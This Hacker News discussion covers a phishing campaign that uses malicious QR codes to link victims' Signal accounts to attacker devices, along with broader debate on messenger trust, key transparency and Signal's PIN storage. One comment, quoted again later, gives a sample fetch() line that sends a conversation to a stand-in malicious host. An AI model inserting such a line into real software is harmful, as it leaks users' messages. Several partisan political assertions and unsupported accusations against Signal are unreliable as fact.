I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
That leaves you with the only remedy for a signal account that has accepted a link to a 'bad device' being to burn the whole account. (maybe rotating safety numbers/keys would be sufficient, i am uncertain there) -- If you can prove the malicious link was only a link, then yeah, the attack i described is incomplete, but the issues in general with linked devices and remedies described are the important bits, I think.
You can always see how many devices a user has: they have a unique integer id so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly than that is an oversight for sure, but I don't think it's the case anymore.
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the save view on your account (keys), which is why key transparency is such an important feature.
Those keys are backed by Keystore on Android, and some similar system on Windows/Linux, i'd assume the same for MacOS/iOS (but I don't know the details) so it's not as simple as just having access to your laptop, they'd need at least root.
Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.
This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.
The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never aware of. That of course relies on you being able to ensure the server is honest, and consistent, but this is already work in progress they are doing.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.
Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc
This was classic phishing though
Outside of lab settings, the only way to do that is: - (1) you get root access to the user's device - (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.
And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.
You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.
A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
I agree. Perhaps it's why I find the discussions like nonce-lengths and randomness sources almost insane (in the sense of willfully missing the forrest from the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
> If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.
All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
We probably agree that this is infeasible for the vast majority of people.
Luckily reproducible builds somewhat sidestep this in a more practical way.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
https://www.bleepingcomputer.com/news/security/signal-will-l...
Would a malicious URL be able to activate this feature as part of the request?
It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
Encrypted milspec comms aren’t the standard in a massive war.
It’s weird but discord, signal and some mapping apps on smartphones are how this war is being fought.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again ,if Ukrainians are being beaten by guy in crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
And I think a pretty much all published Ukrainian and Russian combat footage is vetted by their respective military (who would want to be court martialed for Reddit karma?).
They just take different approaches to what, when and were to release the footage.
I’d want to run military communications on a network my side controls
There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.
Which is a process and procedure issue, more then a security issue on the phones themselves (except in so far as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).
https://www.cbc.ca/news/world/russia-troops-cellphone-ukrain...
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
This is not a simple conversation.
But compromised by whom? Russian, US Intelligence? I am really confused.
I just looked quickly on on the Signal Foundation website and the board members, I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
> This is not a simple conversation.
I agree
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
I didn't realize anyone still used that term with a straight face.
"MongoDB is web scale, you turn it on and it scales right up."
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
Probably true...
A big... what?
Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?
It exists since Android 6: https://developer.android.com/reference/com/google/android/m...
Informative banner that does not require user interaction to dismiss.
Is that what you call the words you don't understand?
EDIT: Like an analytics based approach would probably be far more useful - popping up a confirmation for example if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
Ex: Viktor Yanukovych, prior to being ousted.
Missing from their recommendations: Install No Script: https://noscript.net/
Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...
Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.
It's mostly just interesting to me that they did away with the username entirely and they instead have users connect exclusively through shared secrets like they're Diffie and Hellman.
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
I think we should all agree that outright lying to users on the very first line of their privacy policy page is totally unacceptable.
"Signal is designed to never collect or store any sensitive information."
I interpret this, I think reasonably, to not include encrypted information. For that matter they collect (but probably don't store) encrypted messages. The question is, does PIN+SGX qualify as sufficiently encrypted? This line is a lie only if it does not.
Sorry I skimmed those articles, I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".
I disagree since attacks and leaks can happen/have happened which could compromise that data. Signal was already found to be vulnerable to CacheOut. Even ignoring that guessing or brute forcing a pin is all anyone would need to get a list of everyone a signal user has been in contact with. just having that data (and worse keeping it forever) is a risk that absolutely should be disclosed.
> I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".
that was my conclusion back when all this started. The glaring lie and omissions in their privacy policy were just salt in the wound, but charitably, it might be a dead canary intended to help warn people away from the service. Similarly dropping the popular feature of allowing unsecured sms/mms and introducing a crypto wallet nobody asked for might have also been done to discourage the apps use.
My point is only that the headline of your point was "they are lying about not storing sensitive information". That leaves out a very important part of your point. IMO it makes the claim seem sensationalized and starts you off on the wrong foot.
Why? Encrypted information is still sensitive information.
Or if you want to be literal, you have to say that they're storing sensitive information even if it's encrypted. But by connotation that phrase implies that someone other than the user could conceivably have access to it. So for all any user could care, they just as well are not storing it. Do you mean that they should rephrase it so it's literally correct?
Or do you mean that it's actually bad for them to be collecting safely encrypted sensitive data? Because if so, you literally cannot accept any encrypted messenger because 3rd parties will always have access to it.
see https://web.archive.org/web/20210109010728/https://community...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
Note that the "solution" of disabling pins mentioned at the end of the article was later shown to not prevent the collection and storage of user data. It was just giving users a false sense of security. To this day there is no way to opt out of the data collection.
See https://community.signalusers.org/t/proper-secure-value-secu...
Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)
Signal loves to brag about the times when the government came to them asking for information only to get turned away because Signal never collected any data in the first place. They still brag about it. It hasn't actually been true for years though. Now they're collecting the exact info the government was asking for and they're protecting that data with a not-very-secure/likely backdoored enclave on the server side, and (even worse) a pin on the client side.
“Since a recent version of Signal data of all Signal users is uploaded to Signal’s servers. This includes your profile name and photo, and a list of all your Signal-contacts.”
They then link to a Signal blog (2019) explaining technical measures they were testing to provide verifiably tamperproof remote storage.
https://signal.org/blog/secure-value-recovery/
I’m not equipped to assess the cryptographic integrity of their claims, but 1) it sounds like you’re saying that they deployed this technology at scale, and 2) do you have a basis to suggest it’s “not-very-secure or likely backdoored,” in response to their apparently thoughtful and transparent engineering to ensure otherwise?
The problems with the security of Signal's new data collection scheme was talked about at the time:
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
You'll have to decide for yourself how secure pins and enclaves are, but even if you thought they were able to provide near-perfect security I would argue that outright lying to highly vulnerable users by saying "Signal is designed to never collect or store any sensitive information." on line one of their privacy policy page is inexcusable and not something you should tolerate in an application that depends on trust.
The forum post explains this:
> This data is encrypted by a PIN only the user can know, however users are allowed to create their own very short numeric PIN (4 digits). By itself this does not protect data from being decrypted by brute force. The fact that a slow decryption algorithm must be used, is not enough to mitigate this concern, the algorithm is not slow enough to make brute forcing really difficult. The promise is that Signal keeps tge data secured on their servers within a secure enclave. This allows anyone to verify that no data is taken out of the server, also not by the Dignal developers themselfs, not even if they get a subpoena. At least that is the idea.
> It is also not clear if a subpoena can force Signal to quietly hand over information which was meant to stay within this secure enclave.
That should be very concerning for activists/journalists who use Signal to maintain privacy from their government. Subpoena + gag order means the data is in the hands of the government, presuming Signal want to keep offering their services to the population of the country in question.
In my opinion Briar is where it's at, but because there's no data collection it's pain to do a handshake or manage contacts.
After Moxie's statement at the time I kind of ditched everything regarding Signal's ecosystem. I understand the business perspective of it, but it's kind of pointless trying to say this is open source when it's illegal to press the Fork button on GitHub, you know.
One of the few articles that talked about it at the time: https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
One of the many reddit posts by confused users who misunderstood the very unclear communications by Signal: https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...
Couple this with signal being the preferred messaging app for 5 eyes countries as advised by their 3 letter agencies and well if you think those agencies are going to be advising a comms form they can't track, trace or read you obviously don't understand what they do.
https://signal.org/blog/keeping-spam-off-signal/
They point out that the protocol’s end-to-end cryptographic guarantees are still open and in place, and verifiable as ever. As far as I can tell, they claim that they combine voluntary user spam reports and metadata signals of some sort:
> When a user clicks “Report Spam and Block”, their device sends only the phone number that initiated the conversation and a one-time anonymous message ID to the server. When accounts are repeatedly reported as spam or network traffic appears to be automated, we can issue “proof of humanity” checks to suspicious senders so they can’t send more messages until they’ve completed a challenge. For example, if you exceed a configured server-side threshold for making requests to Signal, you may need to complete a CAPTCHA within the Signal application before making more requests. This approach slows down spammers while allowing regular messages to continue to flow.
Does that seem unreasonable? Am I missing places where people have identified flaws in the protocol?
Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)
https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
https://web.archive.org/web/20250219202428/https://cloud.goo...
Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?
Re-invasion in February 2022
If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.
It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.
Yes, but if they only control the phone number, you they will register a new account (different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.
So what?
Totally agreed that it's out of bounds to label all Trump voters as rednecks & white nationalists. But not sure where you're getting that: read upthread. No one said anything like that. Just "Russia-aligned state actors". Which is also pretty silly.
But in a way, it's worse than all that. If his supporters were actually all rednecks & white nationalists (or Russia-aligned state actors), at least we could say, "well, the country is actually full of shitty, uneducated, racist people, so I guess this actually is the will of the people". But right, that's not the case. Instead, Trump and the GOP have lied and manipulated to the point they've managed to dupe a much more diverse group of people into believing in Trump. Or, at the very least, into believing that the system needs to burn in order for it to be remade in a way that will serve these people's interests.
All this is a crock, of course, and there are already quite a few surprised and upset Trump voters who have experienced an interruption or loss of some government service that they depend on. So ok, let's expand it the list. Sure, there are rednecks & white nationalists. But there are also just regular ol' idiots who fell for Trump's nonsense. And actively awful people who are fine with a lot of others getting hurt, just to spite the current establishment.
Complaining about the comment isn't witty, contain useful information, or promote discussion either.
I would recommend being the change you want to see in the world (or avoid political threads).
USA pushed Ukraine to give up nukes, offered security assurances instead. And then during full scale war donated just 30 old tanks. And now Trump is talking with Putin behind Ukraine's back on how they should surrender.
Unfortunately USA is not a superpower anymore and their word means nothing.
I wish this were true, and while Mr. Trump has dedicated himself to ripping up the world order, the US still has way too many nukes to not treat as a substantial power.
If the US isn't a superpower, I'm not sure there are any superpowers left.
This one is fake, even if plausible. https://www.der-postillon.com/2025/02/ueberfall-auf-polen.ht... - Der Postillon is equivalent to US's The Onion.
Also they try to get the actual database SQL files from Windows devices and Android devices.
the only people that think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling because it is almost always someone who is jealous or insecure attacking said signaler.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to by a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
And, in doing so, achieve the security posture of the worse of the apps!
If you change and abandon your principles were they really principles in the first place?
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
If you don't need to? You tell them to get Signal.
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from having to do the first step, because it's really an annoyance no one cares about, so if you take it for yourself and do it they'll like that
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
On Signal, unless there is a some bug or outright fraud, afaik they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that worked without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though
[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...
Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/
It seems to be but there is more to it than that.
What some people care about is not giving all their private conversations to masculine energy zuck - but don't expect any major wins.
Read a couple books. Privacy is a precondition to democracy.
"Privacy is a precondition to democracy"
Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
We have a long way to go, my friend.
[1] There was a time WhatsApp had a nag-screen if you hadn't Backup to Google activated. So I guess most people would have eventually caved.
Were you aware that Wire keeps a high-fidelity plaintext database of exactly who talks to who on their platform?
And people were reliably startled. But all that was happening was that ordinary users have no mental model for how a secure messenger is designed, and hadn't thought through how serverside contact lists that magically work no matter what device you enroll in the system were actually designed.
So here I'll just say: the stuff you're saying about Signal is pretty banal and uninteresting. The SGX+Enclave stuff is Signal's answer to something every other mainstream messenger does even worse than that. By all means, flunk them on their purity test!
Signal is advertised and recommended to some extremely vulnerable people whose lives/freedom depend on their security. Signal owes users a clear explanation of the risks that come from the use of their software so that whistleblowers, journalists, and activists can make informed choices. Lying to those users is disgusting.
Seen most charitably, the fact that the very first line of their privacy policy page is an outright lie might be intended as a dead canary to warn users away as loudly as they can, but even in that case I'll be happy to say it plainly: Signal shouldn't be trusted.
https://community.signalusers.org/t/proper-secure-value-secu...
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
If however it is fucked up and on a brink of collapse then sure. Little nudge can steer it into "right" direction. but then who is guilty in a first place.
Also:
> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE. > from https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...
Btw, I don't live in the US but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app
Not surprising considering Russian Oligarchs enabled Musk's takeover of Twitter:
https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...
We have never done it with an ally this critical of this size with this level of investment. Yes we have done it with smaller, less critical nations very often and it is of coruse atrocious. In fact Sadam, Bin Ladin, and others were all originally our allies that we betrayed.
But we never did it against an aggressive nuclear power invading Europe.
They were not allies, or not at all in the same sense. They were people the US did business with because of a common enemy, and then stopped doing business with when the situation changed. I don't think Saddam or Bin Laden thought for a moment that they were allies of the US, like Denmark and Japan are.
edit: I will not reply further. What I said would be true regardless of the economic policy or partisan identification of the administration.
``` The sitting US President is literally a Russian asset. He is directing his team to divide up a country that Russia invaded in a summit that is not including that country, and stealing a half trillion in their sovereign mineral wealth without their consent. Calling their president an incompetent dictator and claiming being invaded was somehow their fault. ```
You can't be serious that you consider that to be a good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Using the exact same reasoning, Churchill would be a dictator, too.
Also in the Financial Times the comments sections can be split 50/50.
By the way, the excessive use of the "Russian hacker" meme has been a source of amusement in the German hacker scene even before 2022.
Also, of course, Germany and WW2 are mentioned constantly in Russia itself even today, while most new wars in the past 40 years have been started by the US or Russia.